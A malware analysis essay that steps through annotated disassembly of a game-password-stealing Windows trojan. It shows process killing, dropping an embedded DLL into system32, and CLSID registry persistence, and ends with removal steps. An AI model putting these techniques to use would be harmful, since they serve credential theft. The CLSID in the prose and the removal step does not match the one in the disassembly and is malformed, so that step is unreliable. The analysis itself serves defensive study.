.:: Trojan-PSW.Win32.OnLineGames.eos ::.

Author: Giuseppe 'Evilcry' Bonfa'

E-mail: evilcry {AT} gmail {DOT} com
Website: http://evilcry.altervista.org
Blog: http://evilcodecave.wordpress.com

The Essay

Win32.OnLineGames is a PSW Trojan, which works as a Password Stealer,

specifically written to steal online gaming passwords.

00401314 add eax, esi

00401316 lea eax, ds:401442h
0040131C jmp eax ;00401442

At the entry point, code flow jumps to 00401442

00401442 push ebp

00401443 mov ebp, esp
00401445 sub esp, 52Ch
0040144B call ds:GetCurrentThreadId
00401451 push eax
00401452 call ds:GetThreadDesktop
00401458 test eax, eax
0040145A jnz short loc_40145D
0040145C int 3 ; Trap to Debugger
0040145D push ebx
0040145E push esi
0040145F push edi
00401460 mov edi, offset aCzxsderdaksiic ; "CZXSDERDAKSIICS_MX"
00401465 xor esi, esi
00401467 push edi ; String
00401468 push esi ; NULL
00401469 push EVENT_ALL_ACCESS
0040146E call ds:OpenEventA

Obtains the handle to the desktop associated to the executable itself and opens
the handle of an existing event called CZXSDERDAKSIICS_MX, if event exists its
own handle is closed, else a new event (called CZXSDERDAKSIICS_MX9 is created
with Standard SecurityAttributes.

00401486 mov [ebp-10h], eax

00401489 mov edi, offset off_401154 ;Edi points to an array of strings,
that are a list of executables
0040148E mov ecx, [edi]
00401490 call sub_401798 ;Check if the searched process is running
00401495 cmp eax, esi
00401497 jz short loc_4014B2 ; If no, go to the next process
00401499 push eax
0040149A push esi
0040149B push 1F0FFFh
004014A0 call ds:OpenProcess
004014A6 cmp eax, esi
004014A8 jz short loc_4014B2
004014AA push esi
004014AB push eax
004014AC call ds:TerminateProcess
004014B2 add edi, 4
004014B5 cmp edi, offset dword_40115C ;Next process to search
004014BB jl short loc_40148E
004014BD call sub_40131E ;AdjustTokenPrivilege

The searched executables ere: Twister.exe and FilMsg.exe

0040151B call ds:GetSystemDirectoryA

00401521 mov edx, offset asc_401204 ; "\\"
00401526 lea ecx, [ebp-11Ch] ;points to the System Directory
0040152C call sub_40174A
00401531 lea edx, [ebp-11Ch]
00401537 lea ecx, [ebp-428h]
0040153D call sub_40176F
00401542 push esi
00401543 call ds:GetModuleHandleA
00401549 push offset aMndll ; "MNDLL"
0040154E push 65h
00401550 push eax
00401551 mov [ebp+8], eax
00401554 call ds:FindResourceA
0040155A push eax ;00402048
0040155B mov [ebp-4], eax
0040155E push dword ptr [ebp+8]
00401561 call ds:SizeofResource
00401567 push dword ptr [ebp-4]
0040156A mov [ebp-18h], eax
0040156D push dword ptr [ebp+8]
00401570 call ds:LoadResource
00401576 push eax ;00402070
00401577 call ds:LockResource
0040157D cmp eax, esi
0040157F mov [ebp-4], eax
00401582 jnz short loc_40158E
00401584 push dword ptr [ebp-10h]
00401587 call edi ; CloseHandle
00401589 jmp loc_4016C6

The code here is clear, after enstablishing the System Directory, searches for a
Resource type "MNDLL" and next loads it, the LoadResource give us an intersing
location 00402070, that's an executable image, exploring this executable we can
see some intersing strings http://www.poptang.com/ekey Bind, ConfigAreaName
game.ini, SOFTWARE\Wizet\MapleStory

004015A6 add esp, 0Ch

004015A9 lea edx, [ebp-428h]
004015AF lea ecx, [ebp-11Ch]
004015B5 call ScansFor ;call sub_40176F (searches for csavpw0.dll)
004015BA lea edx, [ebp-324h] ;SystemDirectory
004015C0 lea ecx, [ebp-11Ch] ;csavpw0.dll
004015C6 call sub_40174A
004015CB lea eax, [ebp-11Ch]
004015D1 push eax
004015D2 call ds:DeleteFileA
004015D8 push esi
004015D9 push 80h
004015DE push 2
004015E0 push esi
004015E1 push esi
004015E2 lea eax, [ebp-11Ch]
004015E8 push 40000000h
004015ED push eax
004015EE call ds:CreateFileA
004015F4 cmp eax, 0FFFFFFFFh
004015F7 mov [ebp-14h], eax
004015FA jnz short loc_401605
004015FC inc dword ptr [ebp+8]
004015FF cmp dword ptr [ebp+8], 0Ah
00401603 jb short loc_401591 ;Go to the next cycle

If there is another csavpw0.dll, is firstly deleted and next recreated, if

creation fails is performed the same routine for csavpw1.dll, csavpw2.dll.

In my case, exists csavpw2.dll

00401608 push esi

00401609 push ecx
0040160A push dword ptr [ebp-18h] ; Size: 4C00
0040160D push dword ptr [ebp-4] ; Buffer: 00402070
00401610 push eax
00401611 call ds:WriteFile
0040161A call CloseHandle
0040161C push ebx
0040161D call ds:Sleep
00401623 lea ecx, [ebp-11Ch] ;C:\WINDOWS\system32\csavpw2.dll

csavpw2.dll is filled up with the from Malware's Resources

00401630 push ebx

00401631 lea eax, [ebp-220h]
00401637 push offset aCzxsderdaksi_0 ; "CZXSDERDAKSIICS_%d"
0040163C push eax
0040163D call ds:wsprintfA
00401643 add esp, 0Ch
00401646 lea eax, [ebp-220h]
0040164C push eax ;CZXSDERDAKSIICS_0
0040164D push esi
0040164E push 1F0003h
00401653 call ds:OpenEventA
00401659 cmp eax, esi
0040165B jz short loc_401666
0040165D push eax
0040165E call CloseHandle
00401660 inc ebx
00401661 cmp ebx, 0Ah
00401664 jb short loc_401630

As usual it searches for CZXSDERDAKSIICS_0, CZXSDERDAKSIICS_1, CZXSDERDAKSIICS_2

when the OpenEvent FAILS we have this

0040166C push 104h

00401671 push eax
00401672 push esi
00401673 call ds:GetModuleFileNameA
00401679 lea eax, [ebp-220h] ;CZXSDERDAKSIICS_2
0040167F lea edx, [ebp-52Ch] ;Path of our virus executable
00401685 push eax ;CZXSDERDAKSIICS_2
00401686 lea eax, [ebp-11Ch]
0040168C push eax ;C:\WINDOWS\system32\csavpw2.dll
0040168D mov ecx, offset a8dfa290443ae89 ;
"{8DFA2904-43AE-8929-9664-4347554D24B6}"
00401692 call sub_40124E

-> call sub_40124E Creates a RegKey in HKEY_CLASSES_ROOT with SubKey CLSID\

{8DFA2904-97C43AE-8929-9664-4347554D24B6} and setted some values as
"ExeModuleName", "DllModuleName", "SobjEventName"

004016B5 push eax ; csavpw2.dll

004016B6 call edi ;LoadLibraryA
004016B8 push esi
004016B9 call ds:ExitProcess
004016BF push eax
004016C0 call ds:CloseHandle

.:: Trojan Removal ::.

1) Delete the Trojan file: csavpw0/1/2/etc.dll

2) Delete the following CLSID CLSID\{8DFA2904-97C43AE-8929-9664-4347554D24B6}

Regards,
Giuseppe 'Evilcry' Bonfa'